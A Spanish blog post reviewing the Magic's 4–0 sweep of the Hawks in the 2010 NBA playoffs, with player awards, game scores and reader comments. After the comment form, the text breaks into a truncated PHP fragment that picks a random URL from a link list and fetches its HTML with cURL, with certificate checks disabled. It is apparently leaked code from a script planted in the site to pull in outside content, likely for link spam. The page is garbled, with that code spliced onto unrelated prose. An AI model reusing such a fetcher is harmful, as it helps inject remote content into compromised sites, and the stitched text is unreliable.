Playoffs 2009-2010: Semifinales de Conferencia Este (I)

13 de May de 2010 por TheDeerHunter

Magic 4 – Hawks 0

La mayor barrida de la historia de los playoffs. Un rosco con más de 25 puntos de media de diferencia. Nadie había visto una cosa así, nunca. Es el exponente de las semifinales de conferencia más desequilibradas y deslucidas de toda la historia de la liga. Mucho decir.

Es cierto que muy buenas perspectivas no tenían los Hawks desde el principio. Se vio lo justos que llegaban sufriendo de lo lindo contra unos Bucks cogidos con alfileres. Plantilla muy corta frente a la más larga y compensada de la liga que, además, por configuración es lo peor que les podía tocar en suerte. Nadie daba un duro por los halcones, pero tampoco nadie podía esperar un palizón semejante.

La serie bien puede ilustrarse con las siluetas del monstrouso Supermán Howard frente al pequeño y veterano Mike Bibby. El resultado no habría sido mucho peor si se hubieran jugado la serie en un 1 vs 1 entre ellos. Es triste decirlo, pero la ruina de los Hawks se empieza a entender desde la decadencia de Bibby. Cuánto ha llovido desde que nos deslumbraba dirigiendo a aquellos maravillosos Kings de la primera mitad de la década. Ahora, ni en ataque ni en defensa. Sin Bibby es un equipo sin alma, además de que Nelson no recordará una eliminatoria tan plácida como la que recientemente ha disfrutado.

Apuntábamos en la previa que el duelo Howard vs Horford podía resultar clave. Apenas podríamos considerarlo duelo. Howard ha campado a sus anchas registrando números a la altura de los más grandes. Shaq, Chamberlain, Unseld machacaron en su día a sus rivales como Howard lo ha hecho ahora con Horford.

Aguas por dentro y aguas por fuera. Howard y Nelson sin apenas oposición. Por un lado los Magic han masacrado a sus rivales con 11 triples por partido con un aceptable 40% y por otro los Hawks se la han tenido que jugar a lo que cazaran Joe Johnson y Jamal Crawford, muy presionados por Vince, Barnes, Pietrus en modo perro de presa. Tan solo Josh Smith ha sido capaz de acercarse a producción habitual. Fin de la historia para una serie sin historia.

PREMIOS

MVP: Podríamos elegir entre Dwight Howard y Jameer Nelson. A pesar de todo seguimos considerando a Horford como un interior muy válido… así que el premio se lo queda Supermán. Sin problemas de faltas, 21 puntos, 13 rebotes y casi 3 tapones.

La sorpresa: Vince Carter no es ninguna sorpresa, pero sí lo es que haya recuperado la mejor de sus caras, tanto en defensa como en ataque. Extraordinario en su papel de segunda espada de este equipo. Se le fichó para esto.

La decepción: Mike Bibby. El declive físico es siempre triste… pero lo es mucho más en jugadores que vienen de un nivel tan alto.

El mayor esfuerzo en vano: La gran temporada de Jamal Crawford se ha culminado con unos correctos playoffs. No le podemos reprochar nada al mejor 6º hombre de la liga.

Así os lo contamos nosotros:

Hawks 71 – Magic 114

Hawks 98 – Magic 112

Magic 105 – Hawks 75

Magic 98 – Hawks 84

Comenta

9 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Poco más que comentar esta serie, los marcadores lo dicen todo, sweep sweep!!
    Como mola el peinado de Pietrus!
    Muy buena idea la de poner los enlaces al final para ver las crónicas del día de esos partidos.

      Citar

  2. sergio dice:
    #2

    Vaya semifinales de conferencia mas descafeinadas. Tres se han decidido por un 4-0. No recuerdo que haya pasado nunca nada similar.

    ¿Es un dato historico que sea la mayor barrida de la historia? ¿En cualquier ronda? Jum… este es el tipo de cosas que me gusta indagar jaja.

      Citar

  3. sayim dice:
    #3

    sergio, cito textualmente del blog d nbalakers:

    “Estas Semifinales del Oeste 2010 han sido las más cortas en la historia, desde que la NBA introdujo dicha ronda en 1975. Antes que ésta, la más corta había sido en el 2001, cuando los Spurs vencieron 4-1 a los Mavericks y los Lakers barrieron la serie con los Kings. ”

      Citar

  4. sergio dice:
    #4

    He encontrado primeras rondas similares a 5 partidos como la de los Hornets sobre los Heat en el 2001 con 22 puntos de media, los Bulls a los Heat en el 96 con 24 de media, los Lakers a los Nuggets en el 87 por 28 puntos de media y los Lakers a los Spurs en el 86 por 32 de media.

    La segunda ronda que mas se asemeja quizas sea la de los Cavs y Atlanta del año pasado. Da miedo ver que 3 de los 4 equipos que hicieron algo similar sean los Bulls de Jordan y los Lakers del Showtime. ¿Sera una señal?. Denise seguro que asi lo ve jajaja

      Citar

  5. sergio dice:
    #5

    Gracias por la info sayim.. Y ese año se disputaron entre Oeste y Este un total de 23 partidos. Este año llevan 20 y se pueden jugar un maximo de dos más. Es decir, que lo del Oeste se pude ampliar a toda la liga supongo yo…

      Citar

  6. pcerezo dice:
    #6

    Decepcionantes PO en su conjunto. Partidos sueltos pero no eliminatorias inolvidables, tal vez los Celtics-Cavs nos saquen del tedio. Espera mucho más.

      Citar

  7. TheDeerHunter dice:
    #7

    Es la mayor diferencia a eliminatorias de 4 partidos, Sergio. De ahí lo de “barrida”.

      Citar

  8. sergio dice:
    #8

    Cuando digo a 5 partidos me refiero a quien gane 3, como ocurria en primera ronda no hace mucho tiempo. Ganar una serie al mejor de 5 es lo mismo que ganar 3 partidos. Ejemplos de ese tipo son los que he puesto en el comentario anterior. Es “icir”, que tambien son barridas, pero con un partido menos.

      Citar

  9. TheDeerHunter dice:
    #9

    Confirmado: Woodson al hoyo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>